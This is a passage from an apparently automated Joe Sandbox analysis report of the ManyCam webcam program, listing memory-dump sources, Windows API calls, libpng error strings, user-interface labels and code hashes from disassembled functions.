                                                                                                                                            • Associated: 00000001.00000002.1715873821.0000000000BE7000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715889470.0000000000BEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715904820.0000000000BEB000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715920506.0000000000BEC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715936608.0000000000BEE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_1_2_b90000_ManyCam.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _setjmp3
                                                                                                                                            • String ID: 1.2.2$1.2.8$Application is running with png.c from libpng-%.20s$Application was compiled with png.h from libpng-%.20s$Incompatible libpng version in application and library$Unknown zlib error$zlib memory error$zlib version error
                                                                                                                                            • API String ID: 3837033383-2455210892
                                                                                                                                            • Opcode ID: d655362dc4bb40aa4ec354c44a7d4f37f9be14dffc00173809a9344935bf2ca2
                                                                                                                                            • Instruction ID: 81ad38f9c51c413c3ef469b1891d16a2e0b608cb485c04328f480d0dc28552fd
                                                                                                                                            • Opcode Fuzzy Hash: d655362dc4bb40aa4ec354c44a7d4f37f9be14dffc00173809a9344935bf2ca2
                                                                                                                                            • Instruction Fuzzy Hash: 8751D271A10744AFD720AF649852FFBB7E9EF45300F044599F98997301EBF0A9058BA1
                                                                                                                                            APIs
                                                                                                                                            • _DebugHeapAllocator.LIBCPMTD ref: 0042E198
                                                                                                                                              • Part of subcall function 004167C0: _DebugHeapAllocator.LIBCPMTD ref: 004167CE
                                                                                                                                            • _DebugHeapAllocator.LIBCPMTD ref: 0042E1D1
                                                                                                                                              • Part of subcall function 004167E0: _DebugHeapAllocator.LIBCPMTD ref: 004167EE
                                                                                                                                            • _DebugHeapAllocator.LIBCPMTD ref: 0042E203
                                                                                                                                              • Part of subcall function 0040EA00: _DebugHeapAllocator.LIBCPMTD ref: 0040EA0E
                                                                                                                                            • _DebugHeapAllocator.LIBCPMTD ref: 0042E23C
                                                                                                                                            • _DebugHeapAllocator.LIBCPMTD ref: 0042E258
                                                                                                                                            • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000400), ref: 0042E295
                                                                                                                                            • _DebugHeapAllocator.LIBCPMTD ref: 0042E2A5
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000001.00000002.1715327160.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000001.00000002.1715309277.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715588272.000000000053B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715634819.0000000000595000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715656830.000000000059B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715678398.000000000059C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715700837.00000000005A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_1_2_400000_ManyCam.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: AllocatorDebugHeap$DateFormat
                                                                                                                                            • String ID: Created by: $Creation date: $Name: $www.manycam.com$www.manycam.com
                                                                                                                                            • API String ID: 393568584-1701023392
                                                                                                                                            • Opcode ID: 6ae18c8123b619394136c12ce8f0d690e019f5e653af45ce7849ef6131bd0f08
                                                                                                                                            • Instruction ID: cbadc1f5ef3ad51f7f35ce95d366eb704496e5c2bb1529dbc726db86d70e8f02
                                                                                                                                            • Opcode Fuzzy Hash: 6ae18c8123b619394136c12ce8f0d690e019f5e653af45ce7849ef6131bd0f08
                                                                                                                                            • Instruction Fuzzy Hash: 65711771A001199FCB14EB64CD91BEEB7B4BF48304F10869DE55AA7291DF34AE88CF94
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 00406840: GetWindowLongW.USER32(?,000000F0), ref: 0040684F
                                                                                                                                            • GetParent.USER32 ref: 0040669A
                                                                                                                                            • GetWindow.USER32(?,00000004), ref: 004066AD
                                                                                                                                            • GetWindowRect.USER32(?,?), ref: 004066C0
                                                                                                                                            • GetWindowLongW.USER32(00000000,000000F0), ref: 004066DD
                                                                                                                                            • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 0040670D
                                                                                                                                            • GetWindowRect.USER32(00000000,?), ref: 0040673B
                                                                                                                                            • GetParent.USER32(?), ref: 00406749
                                                                                                                                            • GetClientRect.USER32(?,?), ref: 0040675A
                                                                                                                                            • GetClientRect.USER32(00000000,?), ref: 00406768
                                                                                                                                            • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 0040677C
                                                                                                                                            • SetWindowPos.USER32(7EC02BB4,00000000,00000000,7EC02BB4,000000FF,000000FF,00000015,?,?), ref: 00406826
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000001.00000002.1715327160.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000001.00000002.1715309277.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715588272.000000000053B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715634819.0000000000595000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715656830.000000000059B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715678398.000000000059C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715700837.00000000005A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_1_2_400000_ManyCam.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Window$Rect$ClientLongParent$InfoParametersPointsSystem
                                                                                                                                            • String ID: *b@
                                                                                                                                            • API String ID: 2289592163-3951841937
                                                                                                                                            • Opcode ID: 85e0b70c33394ba71c68aafcb1af9cf7bac2a856a7ed6dfd4d8bfa7c3afbd8a7
                                                                                                                                            • Instruction ID: 1e1c0fd00856f1237eb481f10da8126670bc63b2ce16d521bf68457a350c038b
                                                                                                                                            • Opcode Fuzzy Hash: 85e0b70c33394ba71c68aafcb1af9cf7bac2a856a7ed6dfd4d8bfa7c3afbd8a7
                                                                                                                                            • Instruction Fuzzy Hash: BA611975E00209EFDB04CFE8C984AEEBBB5BF88304F148629E516BB394D734A945CB54
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 004078E0: GetClientRect.USER32(?,00000000), ref: 004078F1
                                                                                                                                            • GetStockObject.GDI32(00000000), ref: 0041C9C4
                                                                                                                                            • FillRect.USER32(?,?,00000000), ref: 0041C9D3
                                                                                                                                            • ?GetHeight@CxImage@@QBEKXZ.CXIMAGECRT ref: 0041C9FF
                                                                                                                                            • ?GetWidth@CxImage@@QBEKXZ.CXIMAGECRT ref: 0041CA2E
                                                                                                                                            • ?Draw@CxImage@@QAEJPAUHDC__@@ABUtagRECT@@PAU3@_N@Z.CXIMAGECRT(00000000,?,00000000,00000000), ref: 0041CA56
                                                                                                                                            • ?GetWidth@CxImage@@QBEKXZ.CXIMAGECRT(00000000,?,00000000,00000000), ref: 0041CA6D
                                                                                                                                            • ?Draw@CxImage@@QAEJPAUHDC__@@ABUtagRECT@@PAU3@_N@Z.CXIMAGECRT(00000000,?,00000000,00000000,00000000,?,00000000,00000000), ref: 0041CA97
                                                                                                                                            • ?Draw@CxImage@@QAEJPAUHDC__@@ABUtagRECT@@PAU3@_N@Z.CXIMAGECRT(00000000,?,00000000,00000000,00000000,?,00000000,00000000,00000000,?,00000000,00000000), ref: 0041CAC5
                                                                                                                                            • ?GetWidth@CxImage@@QBEKXZ.CXIMAGECRT(00000000,?,00000000,00000000,00000000,?,00000000,00000000,00000000,?,00000000,00000000), ref: 0041CB0E
                                                                                                                                            • ?Draw@CxImage@@QAEJPAUHDC__@@ABUtagRECT@@PAU3@_N@Z.CXIMAGECRT(00000000,?,00000000,00000000,00000000,?,00000000,00000000,00000000,?,00000000,00000000,00000000,?,00000000,00000000), ref: 0041CB36
                                                                                                                                            • ?GetWidth@CxImage@@QBEKXZ.CXIMAGECRT(00000000,?,00000000,00000000,00000000,?,00000000,00000000,00000000,?,00000000,00000000,00000000,?,00000000,00000000), ref: 0041CB4D
                                                                                                                                            • ?Draw@CxImage@@QAEJPAUHDC__@@ABUtagRECT@@PAU3@_N@Z.CXIMAGECRT(00000000,?,00000000,00000000,00000000,?,00000000,00000000,00000000,?,00000000,00000000,00000000,?,00000000,00000000), ref: 0041CB77
                                                                                                                                            • ?Draw@CxImage@@QAEJPAUHDC__@@ABUtagRECT@@PAU3@_N@Z.CXIMAGECRT(00000000,?,00000000,00000000,00000000,?,00000000,00000000,00000000,?,00000000,00000000,00000000,?,00000000,00000000), ref: 0041CBA5
                                                                                                                                              • Part of subcall function 00412790: BitBlt.GDI32(FFFFFFFF,?,?,?,?,?,?,?,00CC0020), ref: 00412805
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000001.00000002.1715327160.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000001.00000002.1715309277.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715588272.000000000053B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715634819.0000000000595000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715656830.000000000059B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715678398.000000000059C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715700837.00000000005A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_1_2_400000_ManyCam.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Image@@$C__@@Draw@U3@_Utag$Width@$Rect$ClientFillHeight@ObjectStock
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1214153398-0
                                                                                                                                            • Opcode ID: 1d1617abfc9fbb8697bfd5c8fbec6c435857e0e2642eb5cd6e205186f3222b68
                                                                                                                                            • Instruction ID: 64adb8edbe6d6a745132db4a95317a47dd4f78eb1bf019a77eab89ed2a27929a
                                                                                                                                            • Opcode Fuzzy Hash: 1d1617abfc9fbb8697bfd5c8fbec6c435857e0e2642eb5cd6e205186f3222b68
                                                                                                                                            • Instruction Fuzzy Hash: 8A81C3B4D002099FDB58EF98D991BEEB7B5BF48304F20816AE519B7381DB342A45CF64
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000001.00000002.1715327160.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000001.00000002.1715309277.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715588272.000000000053B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715634819.0000000000595000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715656830.000000000059B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715678398.000000000059C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715700837.00000000005A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_1_2_400000_ManyCam.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 898b4d837ae699b25311b23fbbf044c2f725344d7131efd26da484f397ae12a6
                                                                                                                                            • Instruction ID: 12e37dd4abdcf4f70f14d239c3f2fb0002299592faa212dd5bf358f334e534ec
                                                                                                                                            • Opcode Fuzzy Hash: 898b4d837ae699b25311b23fbbf044c2f725344d7131efd26da484f397ae12a6
                                                                                                                                            • Instruction Fuzzy Hash: 20615470904308EFDB14DFA4D85AAEEBFB6BF55310F204A19E516AB2D1EB305A48DB50
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000001.00000002.1715327160.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000001.00000002.1715309277.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715588272.000000000053B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715634819.0000000000595000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715656830.000000000059B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715678398.000000000059C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715700837.00000000005A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_1_2_400000_ManyCam.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: #NC$Backgrounds$Date & Time$Drawing over video$Text over video
                                                                                                                                            • API String ID: 0-745308588
                                                                                                                                            • Opcode ID: e89cde5ceba465d579d9307fe3d900b605cbcdb901679e140c7094b8ba2244ab
                                                                                                                                            • Instruction ID: 61b0055fb2e5cbe1d4e4773f87cdc9b928e12edc189f893c90bd2281fadebac5
                                                                                                                                            • Opcode Fuzzy Hash: e89cde5ceba465d579d9307fe3d900b605cbcdb901679e140c7094b8ba2244ab
                                                                                                                                            • Instruction Fuzzy Hash: D4B14271D052189FCF08EFE5D851BEEBBB5BF48308F14452EE10A6B282DB385945CB99
                                                                                                                                            APIs
                                                                                                                                            • GetClassNameW.USER32(?,00000000,00000008), ref: 00406BCD
                                                                                                                                            • lstrcmpiW.KERNEL32(00000000,static), ref: 00406BE4
                                                                                                                                              • Part of subcall function 00407320: GetWindowLongW.USER32(-00000004,000000F0), ref: 00407331
                                                                                                                                              • Part of subcall function 00406840: GetWindowLongW.USER32(?,000000F0), ref: 0040684F
                                                                                                                                            • LoadCursorW.USER32(00000000,00007F89), ref: 00406C72
                                                                                                                                            • GetStockObject.GDI32(0000000D), ref: 00406CC9
                                                                                                                                            • memset.MSVCR80 ref: 00406D0D
                                                                                                                                            • CreateFontIndirectW.GDI32(00000000), ref: 00406D7E
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000001.00000002.1715327160.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000001.00000002.1715309277.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715588272.000000000053B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715634819.0000000000595000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715656830.000000000059B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715678398.000000000059C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715700837.00000000005A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_1_2_400000_ManyCam.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: LongWindow$ClassCreateCursorFontIndirectLoadNameObjectStocklstrcmpimemset
                                                                                                                                            • String ID: Anchor Color$Anchor Color Visited$Software\Microsoft\Internet Explorer\Settings$static
                                                                                                                                            • API String ID: 537339791-2739629574
                                                                                                                                            • Opcode ID: 99ecedde21c05c3d22bbeafe7e2b67f4cdb7fe62b879cd42fd35616c0f2689b9
                                                                                                                                            • Instruction ID: 199e44e7be4628ee2e688c610ba56af09b0a08d7a3a9a70c30624c5daa12086b
                                                                                                                                            • Opcode Fuzzy Hash: 99ecedde21c05c3d22bbeafe7e2b67f4cdb7fe62b879cd42fd35616c0f2689b9
                                                                                                                                            • Instruction Fuzzy Hash: 45E14970A042689FDB64DB65CC49BAEB7B1AF04304F1042EAE54A772D2DB346EC4CF59
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000001.00000002.1715327160.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000001.00000002.1715309277.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715588272.000000000053B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715634819.0000000000595000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715656830.000000000059B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715678398.000000000059C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715700837.00000000005A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_1_2_400000_ManyCam.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: clock$AllocatorDebugHeapfflushfwprintf
                                                                                                                                            • String ID: CEffectStack::SelectEffect$Effect pointer is NULL.$No such effect found in stack$AN
                                                                                                                                            • API String ID: 2739697835-3664681806
                                                                                                                                            • Opcode ID: 221cc7908e8e233be853d1dd1845420aec90c9ea438a58ddf34726c8fe8ac0e0
                                                                                                                                            • Instruction ID: 60628f8e65fa033cdeac9a30f19292ee3b75e2ecbf0df95034a13fcf3e9652a5
                                                                                                                                            • Opcode Fuzzy Hash: 221cc7908e8e233be853d1dd1845420aec90c9ea438a58ddf34726c8fe8ac0e0
                                                                                                                                            • Instruction Fuzzy Hash: FEB13A70E00208DFDB14DFA9C895BEEBBB5FF59314F10811EE415AB292DB786905CB98
                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            • Ignoring attempt to set negative chromaticity value, xrefs: 00BB9F1B
                                                                                                                                            • Ignoring attempt to set chromaticity value exceeding 21474.83, xrefs: 00BB9F0B
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000001.00000002.1715789441.0000000000B91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                            • Associated: 00000001.00000002.1715768409.0000000000B90000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715833413.0000000000BDD000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715858991.0000000000BE6000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715873821.0000000000BE7000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715889470.0000000000BEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715904820.0000000000BEB000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715920506.0000000000BEC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715936608.0000000000BEE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_1_2_b90000_ManyCam.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _ftol
                                                                                                                                            • String ID: Ignoring attempt to set chromaticity value exceeding 21474.83$Ignoring attempt to set negative chromaticity value
                                                                                                                                            • API String ID: 2545261903-1928962588
                                                                                                                                            • Opcode ID: 3f56ec2db3fc1ca85903a98619f27c2295566257b2a88fa86aed4e9f67b4d511
                                                                                                                                            • Instruction ID: 6456b4c038c8cb1d6d6f49463760314b90dea20f2aca757bc7e01c34bb30960b
                                                                                                                                            • Opcode Fuzzy Hash: 3f56ec2db3fc1ca85903a98619f27c2295566257b2a88fa86aed4e9f67b4d511
                                                                                                                                            • Instruction Fuzzy Hash: 65513C70005B5AD7EB106F10F61C3A6BBF4FB89790F010E9AE1E5551A9DFB1E4A9C702
                                                                                                                                            Strings
                                                                                                                                            • Missing IHDR before sRGB, xrefs: 00BBCC4E
                                                                                                                                            • Out of place sRGB chunk, xrefs: 00BBCC80
                                                                                                                                            • Incorrect sRGB chunk length, xrefs: 00BBCCC4
                                                                                                                                            • incorrect gamma=(%d/100000), xrefs: 00BBCD53
                                                                                                                                            • Ignoring incorrect cHRM value when sRGB is also present, xrefs: 00BBCE14
                                                                                                                                            • Unknown sRGB intent, xrefs: 00BBCD0C
                                                                                                                                            • Duplicate sRGB chunk, xrefs: 00BBCC9E
                                                                                                                                            • Invalid sRGB after IDAT, xrefs: 00BBCC5F
                                                                                                                                            • Ignoring incorrect gAMA value when sRGB is also present, xrefs: 00BBCD38
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000001.00000002.1715789441.0000000000B91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                            • Associated: 00000001.00000002.1715768409.0000000000B90000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715833413.0000000000BDD000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715858991.0000000000BE6000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715873821.0000000000BE7000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715889470.0000000000BEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715904820.0000000000BEB000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715920506.0000000000BEC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715936608.0000000000BEE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_1_2_b90000_ManyCam.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: Duplicate sRGB chunk$Ignoring incorrect cHRM value when sRGB is also present$Ignoring incorrect gAMA value when sRGB is also present$Incorrect sRGB chunk length$Invalid sRGB after IDAT$Missing IHDR before sRGB$Out of place sRGB chunk$Unknown sRGB intent$incorrect gamma=(%d/100000)
                                                                                                                                            • API String ID: 0-1854797742
                                                                                                                                            • Opcode ID: 15d62596973379f738e0b8c0f291941daaae913da8739d71c017c38a12be711d
                                                                                                                                            • Instruction ID: af90abe57d709b34c2ba3bdbe020a2d6d87fe2fbb4e17b999ed89d70ed677c9f
                                                                                                                                            • Opcode Fuzzy Hash: 15d62596973379f738e0b8c0f291941daaae913da8739d71c017c38a12be711d
                                                                                                                                            • Instruction Fuzzy Hash: C841E5716006456BE724E618DCC6EFB6BD4EF81B54F1408E9F548E2392C7D8FCA492B2
                                                                                                                                            APIs
                                                                                                                                            • ??0_Lockit@std@@QAE@H@Z.MSVCP80(00000000,7EC02BB4,?,?,?,00000000,00538D49,000000FF,?,0050405E,?), ref: 005047EA
                                                                                                                                            • ??Bid@locale@std@@QAEIXZ.MSVCP80(?,?,?,00000000,00538D49,000000FF,?,0050405E), ref: 00504804
                                                                                                                                            • ?_Getfacet@locale@std@@QBEPBVfacet@12@I@Z.MSVCP80(00538D49,?,?,?,00000000,00538D49,000000FF,?,0050405E), ref: 00504814
                                                                                                                                            • ??1_Lockit@std@@QAE@XZ.MSVCP80(00585C98,00585C98), ref: 00504898
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000001.00000002.1715327160.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000001.00000002.1715309277.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715588272.000000000053B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715634819.0000000000595000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715656830.000000000059B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715678398.000000000059C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715700837.00000000005A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_1_2_400000_ManyCam.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Lockit@std@@$??0_??1_Bid@locale@std@@Getfacet@locale@std@@Vfacet@12@
                                                                                                                                            • String ID: ^@P$bad cast
                                                                                                                                            • API String ID: 2261832285-3230263104
                                                                                                                                            • Opcode ID: 3b2a1131cef9067ba1ac1022581be8c82768a399d86bdfc45b63dcb7fc16c2e6
                                                                                                                                            • Instruction ID: 824bbbae0ea1dedba38b35fd60e665a14d2ea96d15b6e9388a122e9d75c37290
                                                                                                                                            • Opcode Fuzzy Hash: 3b2a1131cef9067ba1ac1022581be8c82768a399d86bdfc45b63dcb7fc16c2e6
                                                                                                                                            • Instruction Fuzzy Hash: 4631F9B4D04209DFDB08DFA5E845AAEBBB5FF58310F108A2AE922A33D0DB745905DF50
                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            • Not enough memory to decompress chunk, xrefs: 00BBBF59
                                                                                                                                            • Buffer error in compressed datastream in %s chunk, xrefs: 00BBBFE6
                                                                                                                                            • Unknown zTXt compression type %d, xrefs: 00BBC0B7
                                                                                                                                            • Not enough memory to decompress chunk., xrefs: 00BBBDD5
                                                                                                                                            • Error decoding compressed text, xrefs: 00BBBF15, 00BBBFB0
                                                                                                                                            • Not enough memory for text., xrefs: 00BBC054
                                                                                                                                            • Data error in compressed datastream in %s chunk, xrefs: 00BBBFFE
                                                                                                                                            • Incomplete compressed datastream in %s chunk, xrefs: 00BBC011
                                                                                                                                            • Not enough memory to decompress chunk.., xrefs: 00BBBE5C
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000001.00000002.1715789441.0000000000B91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                            • Associated: 00000001.00000002.1715768409.0000000000B90000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715833413.0000000000BDD000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715858991.0000000000BE6000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715873821.0000000000BE7000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715889470.0000000000BEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715904820.0000000000BEB000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715920506.0000000000BEC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715936608.0000000000BEE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_1_2_b90000_ManyCam.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: sprintf
                                                                                                                                            • String ID: Buffer error in compressed datastream in %s chunk$Data error in compressed datastream in %s chunk$Error decoding compressed text$Incomplete compressed datastream in %s chunk$Not enough memory for text.$Not enough memory to decompress chunk$Not enough memory to decompress chunk.$Not enough memory to decompress chunk..$Unknown zTXt compression type %d
                                                                                                                                            • API String ID: 590974362-1349257056
                                                                                                                                            • Opcode ID: c574cfb1be46fc766cd4d0dcad4e9aed8f2e66d88e2508abe8694121230a2c95
                                                                                                                                            • Instruction ID: 84dda99d968ca64c5466ddce437ac674e0f79c3ad76251876832a03256a1bf22
